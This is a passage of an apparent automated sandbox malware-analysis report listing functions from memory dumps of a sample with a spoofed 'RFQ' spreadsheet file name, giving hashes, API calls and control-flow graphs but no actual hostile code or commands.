                                              • Instruction Fuzzy Hash: 18B15270E002098FDB14CFA9C98579FBBF2AF88714F18812ED515E73A4EB749846CB81
                                              Function 014F3E50 Relevance: .2, Instructions: 238COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 92a1b0360b3e265529173acf0fad6ed8847111c98c65ed37d2e9e104681f7324
                                              • Instruction ID: 45e0e75d8b0ebf69d1674ce8d137b60d9e9d3e43778ff1231968350df1312571
                                              • Opcode Fuzzy Hash: 92a1b0360b3e265529173acf0fad6ed8847111c98c65ed37d2e9e104681f7324
                                              • Instruction Fuzzy Hash: 449132B0E002099FDF14CFA9C99579EBBF2BF88314F14812EE515A7364EB749845CB91
                                              Function 066DE0C8 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3015 66de0c8-66de0d3 3016 66de0fd-66de11c call 66dce40 3015->3016 3017 66de0d5-66de0fc call 66dce34 3015->3017 3023 66de11e-66de121 3016->3023 3024 66de122-66de155 3016->3024 3029 66de157-66de181 3024->3029 3032 66de187-66de19c 3029->3032 3033 66de183-66de186 3029->3033 3032->3029 3035 66de19e-66de214 GlobalMemoryStatusEx 3032->3035 3037 66de21d-66de245 3035->3037 3038 66de216-66de21c 3035->3038 3038->3037
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3278418799.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_66d0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d58d0b7a2bfef17787fd364b5cafc0438055ef192c144159e2543a7ee71626a
                                              • Instruction ID: aac312df58d40802872f3fce5e8ab64793ecf1c30564bf7240bf8d28d3986bf1
                                              • Opcode Fuzzy Hash: 1d58d0b7a2bfef17787fd364b5cafc0438055ef192c144159e2543a7ee71626a
                                              • Instruction Fuzzy Hash: 17412672D0439A8FCB00DF69D8446DEBFF5AF89210F1486AAD454E7391DB389845CBE0
                                              Function 071C0558 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,071C0E09,00000800), ref: 071C0E9A
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3280725075.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_71c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: ab8a6f2e7c7da7f334d087df6748ecf4298ddec44f934a9be4298b4da24c0358
                                              • Instruction ID: 4ed070bff282c559deb48da33cf85b15c854c740502ee09245321fb82a6648b2
                                              • Opcode Fuzzy Hash: ab8a6f2e7c7da7f334d087df6748ecf4298ddec44f934a9be4298b4da24c0358
                                              • Instruction Fuzzy Hash: A611D0B6900249DFDB10CF9AC944A9EFBF5EB98310F14842EE919B7240C375A945CFA5
                                              Function 066DCE40 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3041 66dce40-66de214 GlobalMemoryStatusEx 3044 66de21d-66de245 3041->3044 3045 66de216-66de21c 3041->3045 3045->3044
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,066DE11A), ref: 066DE207
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3278418799.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_66d0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: 3909ef2a1e7633eba288a0aaa7450f39bb08f161617696734f35762b9008d0d6
                                              • Instruction ID: 54f326c0a4a1da719bfebb04d7d79fd2752fce37f389c8dbb87c995373f054b3
                                              • Opcode Fuzzy Hash: 3909ef2a1e7633eba288a0aaa7450f39bb08f161617696734f35762b9008d0d6
                                              • Instruction Fuzzy Hash: 871136B1C0065A9BCB10CF9AC844B9EFBF8EB48310F10816AE918A7241D779A944CFE1
                                              Function 071C0E29 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,071C0E09,00000800), ref: 071C0E9A
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3280725075.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_71c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 8536cbd66674b5500c8f3b3ef8742da2e9efb387da1e43f80974b5d88230ee4c
                                              • Instruction ID: b4de4c6cc5fcb29efea57e5569dced2a44eb324d022b492b31519002c250597f
                                              • Opcode Fuzzy Hash: 8536cbd66674b5500c8f3b3ef8742da2e9efb387da1e43f80974b5d88230ee4c
                                              • Instruction Fuzzy Hash: B11100B6C003099FCB14CF9AC844A9EFBF4EB98310F10842EE919B7240C375A945CFA5
                                              Function 014F6FFF Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRcq
                                              • API String ID: 0-4134321033
                                              • Opcode ID: 614f4b58db734fc60d3f0fe70da271b01bacff1128e77dc17222c344cbc4a2ee
                                              • Instruction ID: 70d2fca39e2db421de59dd3d838acf5a3e7921a2bc153c76d98c0eef14fe0d98
                                              • Opcode Fuzzy Hash: 614f4b58db734fc60d3f0fe70da271b01bacff1128e77dc17222c344cbc4a2ee
                                              • Instruction Fuzzy Hash: C9418B74F002068FDB15CF69C85479EBBB2EF85301F20852EE606EB3A1DB759946CB51
                                              Function 014FF3C5 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PHcq
                                              • API String ID: 0-4245845256
                                              • Opcode ID: 95365df418462600a028234125cd84d5197f6e42e1b47a5fdfaac53a2ce7c67a
                                              • Instruction ID: 0ecf949b29363d292a35eaed9eed522f838a21e038be7e4158ba9297b063b0f1
                                              • Opcode Fuzzy Hash: 95365df418462600a028234125cd84d5197f6e42e1b47a5fdfaac53a2ce7c67a
                                              • Instruction Fuzzy Hash: C331E3717002018FEB169F78D55466F7BE2EF85200B64457ED106DB3A6DE34DC4ACB91
                                              Function 014FF3D8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PHcq
                                              • API String ID: 0-4245845256
                                              • Opcode ID: 80f6bbbed164d2b85593f3ba73f462f830bfd90bc24d7167d4a5889d2c452af9
                                              • Instruction ID: 15965f3c3c8364ed7153b283e18c0ab40c241aaca821802187b5ca8d10d67f95
                                              • Opcode Fuzzy Hash: 80f6bbbed164d2b85593f3ba73f462f830bfd90bc24d7167d4a5889d2c452af9
                                              • Instruction Fuzzy Hash: 0B31F2717002058FEB169F78D45466F7BE2EF88200B64843DD506DB3A6DE34DC8ACB95
                                              Function 014F7010 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRcq
                                              • API String ID: 0-4134321033
                                              • Opcode ID: f5e02342328ecfae00383023f9d72165c04f265a3140e466d913bc4ea4003aeb
                                              • Instruction ID: 3cf82c5471e0610e6e74cafc4c6d07c568b0dae402e657649c7a0179e8bfa005
                                              • Opcode Fuzzy Hash: f5e02342328ecfae00383023f9d72165c04f265a3140e466d913bc4ea4003aeb
                                              • Instruction Fuzzy Hash: 6A318F74E0020A9FDB19CFA9C44479EB7B2FF85301F20852AEA05EB361DB75A946CB51
                                              Function 014F6B69 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRcq
                                              • API String ID: 0-4134321033
                                              • Opcode ID: 3778ba75654ecd2702ec067b8ecb2f4a8991fb23d7da68b80234791b4a3d9cbd
                                              • Instruction ID: 5f2ead6103ee6ad4af18be6383a55c1f8663620e95259f808e7f2febd818118d
                                              • Opcode Fuzzy Hash: 3778ba75654ecd2702ec067b8ecb2f4a8991fb23d7da68b80234791b4a3d9cbd
                                              • Instruction Fuzzy Hash: 5F1104717082418FC706AB79842466E7FB2EF8A301B1580BFD409CB3A6DA758840CB92
                                              Function 014F79B2 Relevance: .6, Instructions: 558COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aa3c3b2202be6de6bff47c2731aa70bddcdaefa586c2f4f7ebd8929bfab3dd0c
                                              • Instruction ID: ae572a3bb413cd91df5e2e58b404a297bc1f72167f299071c3eb8614080e26ff
                                              • Opcode Fuzzy Hash: aa3c3b2202be6de6bff47c2731aa70bddcdaefa586c2f4f7ebd8929bfab3dd0c
                                              • Instruction Fuzzy Hash: 2A129F71311202CFCB2B9B3DE58422D7AA2FBD5305B64897EE205CB365CE35DC468B91
                                              Function 014F4A5E Relevance: .3, Instructions: 261COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a17a26b5bf0157b63358b3e0c8faec5b528b2558090aa26ce0c826facdb22018
                                              • Instruction ID: 63da4557baf9e0bfae5f527ce1eeb24a171090f0a3916c5096cd2729627744a9
                                              • Opcode Fuzzy Hash: a17a26b5bf0157b63358b3e0c8faec5b528b2558090aa26ce0c826facdb22018
                                              • Instruction Fuzzy Hash: 4EB14E70E002099FDB10CFA9D9857AEBBF1AF88714F18812ED514E73A5EB749846CB81
                                              Function 014F940C Relevance: .2, Instructions: 240COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 855610d10832a9bc2df19df432a41d818c3b19db6b980a79fd09469c080c122f
                                              • Instruction ID: 39448fc6b85640b0393b91cc664ae1d71c94e87c0fe3a66d37e82c00a9ae0f47
                                              • Opcode Fuzzy Hash: 855610d10832a9bc2df19df432a41d818c3b19db6b980a79fd09469c080c122f
                                              • Instruction Fuzzy Hash: 23915B74A002058FDB15DF69D584AAEBBF2FF88314F14856AEA06E73A5DB34DC42CB50
                                              Function 014F3E46 Relevance: .2, Instructions: 235COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3392e3c54d30cda90cc6730362f8cee3a1187e071138a5e3bed3e7160543821d
                                              • Instruction ID: 58f4f418045a4542c585319458ae0729228e13829916be3c01485b92b6f035ab
                                              • Opcode Fuzzy Hash: 3392e3c54d30cda90cc6730362f8cee3a1187e071138a5e3bed3e7160543821d
                                              • Instruction Fuzzy Hash: 72A13CB0E00209DFDB14CFA9C98579EBBF1BF88314F18812EE615A7364EB749845CB91
                                              Function 014F47D4 Relevance: .2, Instructions: 181COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 278b6298066ee3fe7f4244200b74fe5301e062a9559f0c16ed3f2a536c487950
                                              • Instruction ID: 82ac9f0f4b7b85c36d6f00543f7578923083661a819671121000b9dc70aa56d6
                                              • Opcode Fuzzy Hash: 278b6298066ee3fe7f4244200b74fe5301e062a9559f0c16ed3f2a536c487950
                                              • Instruction Fuzzy Hash: F8714D70E002499FDB10CFA9C885B9EBBF1EF88714F18812EE515A7364EB749845CB91
                                              Function 014F47E0 Relevance: .2, Instructions: 180COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9cd22d07c3f8ceb29c39115ee4d4220b62ff13a6e71b161e94e8bb18172b8d48
                                              • Instruction ID: 56b8d7c05bfcdaf5e3db8cc58edba05c7e46adf19a660c6b6a7780af33563acc
                                              • Opcode Fuzzy Hash: 9cd22d07c3f8ceb29c39115ee4d4220b62ff13a6e71b161e94e8bb18172b8d48
                                              • Instruction Fuzzy Hash: F1716070E002499FDB10CFA9C885B9FBBF2EF88714F18812ED515A7364EB749846CB91
                                              Function 014F6CA5 Relevance: .1, Instructions: 132COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fe84c77aec3b451d8242750cd827841403626a6857b328a0b20d3f2d204c29db
                                              • Instruction ID: fd544d69670228bf5685001a169f60beafa6323d8581244a8661b95b750c312b
                                              • Opcode Fuzzy Hash: fe84c77aec3b451d8242750cd827841403626a6857b328a0b20d3f2d204c29db
                                              • Instruction Fuzzy Hash: FB513471D102188FDB18CFA9C884BAEBBB1FF48310F15812EE919AB3A5C7749845CF91
                                              Function 014F6CB0 Relevance: .1, Instructions: 132COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb912f8e8a815ce9fab926818c4fe52c5ca390507c9bee77ee38fca5d9b8c068
                                              • Instruction ID: e22584d6a8b9bcd5072a28dd5b74db04cd716616bfcabbbb17b48c5c440334d1
                                              • Opcode Fuzzy Hash: bb912f8e8a815ce9fab926818c4fe52c5ca390507c9bee77ee38fca5d9b8c068
                                              • Instruction Fuzzy Hash: 78512371D102188FDB18CFA9C884B9EBBB1FF48310F15811EE919AB3A5DB74A845CB95
                                              Function 014F112A Relevance: .1, Instructions: 107COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fb28402330d40580a897dc474356b2f030a7a93eba4afd9f2945c267729043f3
                                              • Instruction ID: f4026b30c5bb2a1b637b3adda08773324e1758832dd03b82f058e023c14657ea
                                              • Opcode Fuzzy Hash: fb28402330d40580a897dc474356b2f030a7a93eba4afd9f2945c267729043f3
                                              • Instruction Fuzzy Hash: B751F971351281CFC716DB3CF989944BF66FB6670434489A9F005AB236DF286D49CBA2
                                              Function 014F133F Relevance: .1, Instructions: 102COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db6b69b2ae590fb82dad7f39a1b91d706dc9036440dff40247147ec8f8ed5f66
                                              • Instruction ID: 60c5f0d50d0da1370e84ddfdee9d7a0404e12c7a85af57c14c1b5c645e6a9215
                                              • Opcode Fuzzy Hash: db6b69b2ae590fb82dad7f39a1b91d706dc9036440dff40247147ec8f8ed5f66
                                              • Instruction Fuzzy Hash: B531C170710201CFEB32DB2CF4887593B66FB56B54F0409AEE606CB37ADA398D858B51
                                              Function 014F1138 Relevance: .1, Instructions: 100COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c72de6c7a71562e6bb21c3e3676662096ef32301f0f2c69a665130c92cd11e83
                                              • Instruction ID: c0470824c1a0a398108fddd631ad7ca079bbc1a04505de2f9d00ac3c322ee0c4
                                              • Opcode Fuzzy Hash: c72de6c7a71562e6bb21c3e3676662096ef32301f0f2c69a665130c92cd11e83
                                              • Instruction Fuzzy Hash: 4141E871351181CFCB16DB3CF989948BF67FBA570434489A9F005AB236DF286D49CBA2
                                              Function 014FF288 Relevance: .1, Instructions: 96COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f0bed4d0fee5b8de0039423e83664be0fc63e30a16d762227dc53cc2fcea0fbb
                                              • Instruction ID: 91411f173aa4401bb399fbe618ab845b3cdb1be0ad95c79ca909eb88937b701d
                                              • Opcode Fuzzy Hash: f0bed4d0fee5b8de0039423e83664be0fc63e30a16d762227dc53cc2fcea0fbb
                                              • Instruction Fuzzy Hash: 14317E35E106058BCB19CF69D594A9EBBB2FF89300F10852EE906E7364DB71EC46CB40
                                              Function 014F26AC Relevance: .1, Instructions: 94COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 44753192c22c0c030c07cecc14fac6fb49fab790681855f76dc777dc5f73c346
                                              • Instruction ID: 9af2a30e554df3ecb54b8a7454ec42d2a005b593120f3a4f42f76b0daea21e9f
                                              • Opcode Fuzzy Hash: 44753192c22c0c030c07cecc14fac6fb49fab790681855f76dc777dc5f73c346
                                              • Instruction Fuzzy Hash: 5541CFB1900349DFDB10DFA9C484ADEBFF5EF48314F24802AE519AB354DB75A945CB90
                                              Function 014F1790 Relevance: .1, Instructions: 93COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6d13984db103e65ea156380757e6e810f9d343e78e30f0a21f227c1d4d53a265
                                              • Instruction ID: 2c94701d1e8f51989880edcc6a298285f0e980dc3e59628a4bc02743542215d9
                                              • Opcode Fuzzy Hash: 6d13984db103e65ea156380757e6e810f9d343e78e30f0a21f227c1d4d53a265
                                              • Instruction Fuzzy Hash: EF31F031B00201DFDF61DB7CA84875FB7E5FB89754F24056AEA0AD7329EA348D018B92
                                              Function 014FF298 Relevance: .1, Instructions: 91COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 47775066e7e4bebffb60be941882277fb9f72133b217915a63fb710fbc77cca1
                                              • Instruction ID: 6984c6ac3a36208eb5e44007181d81281136861f08a04f5eae47490a61f79f96
                                              • Opcode Fuzzy Hash: 47775066e7e4bebffb60be941882277fb9f72133b217915a63fb710fbc77cca1
                                              • Instruction Fuzzy Hash: EC317E35E106059BCB19CFA9D594A9EBBB2EF89300F10852EE946E7364DF70EC46CB50
                                              Function 014F5068 Relevance: .1, Instructions: 90COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7f06dc7b0df9dde86b100b6773f9cfbf3e78d5d79bbe3b054f41c473e5c3a128
                                              • Instruction ID: 2242d0a2abcdd6fbe77259d5b35b8e347ed00d372cb6840c5b47adbb5a22c94a
                                              • Opcode Fuzzy Hash: 7f06dc7b0df9dde86b100b6773f9cfbf3e78d5d79bbe3b054f41c473e5c3a128
                                              • Instruction Fuzzy Hash: 8F313A74B00211CFDB15DB78D6546AEB7B2EB99244B1000ADDA01AB374DF3A9C01CBA5
                                              Function 014F26B8 Relevance: .1, Instructions: 90COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 68f951694b54b21d4ba4b9198e29ac9e576a7f8b739cf34d4feba63e70f86536
                                              • Instruction ID: 7065a0bd313d5a0e61895631b33e4fccee4f8e33c99c5b8bace32a77daba8087
                                              • Opcode Fuzzy Hash: 68f951694b54b21d4ba4b9198e29ac9e576a7f8b739cf34d4feba63e70f86536
                                              • Instruction Fuzzy Hash: D541CEB1D003499FDB10DF99C884A9EBFF5EF48314F24802AE919AB364DB75A945CB90
                                              Function 014F5078 Relevance: .1, Instructions: 89COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 59eb7219e26da5a5ecbf34328c10c7b65a4b9319a50b7519755c53a9a4a0cc87
                                              • Instruction ID: cbba686e559c2a51a2dedb4098e105fe0d411d63d1554b62afa4cbdcb6d7ccb1
                                              • Opcode Fuzzy Hash: 59eb7219e26da5a5ecbf34328c10c7b65a4b9319a50b7519755c53a9a4a0cc87
                                              • Instruction Fuzzy Hash: F2316C74B00215CFDB15DB79D6146AEB7B2EB99244F1000ADD601AB3B4DF3A9C41CBA2
                                              Function 014F1457 Relevance: .1, Instructions: 86COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9492d63384140bfd7c4b0293242535b0d80b2400341311af465f18506f887782
                                              • Instruction ID: 50df69490a3b3bcbbe80fc9b9836b78306fea5a657cb53a8a68a96fdeb11089f
                                              • Opcode Fuzzy Hash: 9492d63384140bfd7c4b0293242535b0d80b2400341311af465f18506f887782
                                              • Instruction Fuzzy Hash: A4318231A01211CFCB22EFB9D4942AE7BB5EB95610F1404BFEA0AD7362D735CD418B91
                                              Function 014F92F8 Relevance: .1, Instructions: 85COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ca96b7d49d2df8e06cbe14ba858d9a1eddacde8794f03b70875059201d302f4a
                                              • Instruction ID: afc8ad02ad18f4332e1c2f8b5ef546b1bd4cc8205649d35238911712ca24a5d2
                                              • Opcode Fuzzy Hash: ca96b7d49d2df8e06cbe14ba858d9a1eddacde8794f03b70875059201d302f4a
                                              • Instruction Fuzzy Hash: CA317371E002059FDB19CF59D45079EBBB2FF89304F14862AE505EB3A1DB719846CB90
                                              Function 014F1672 Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
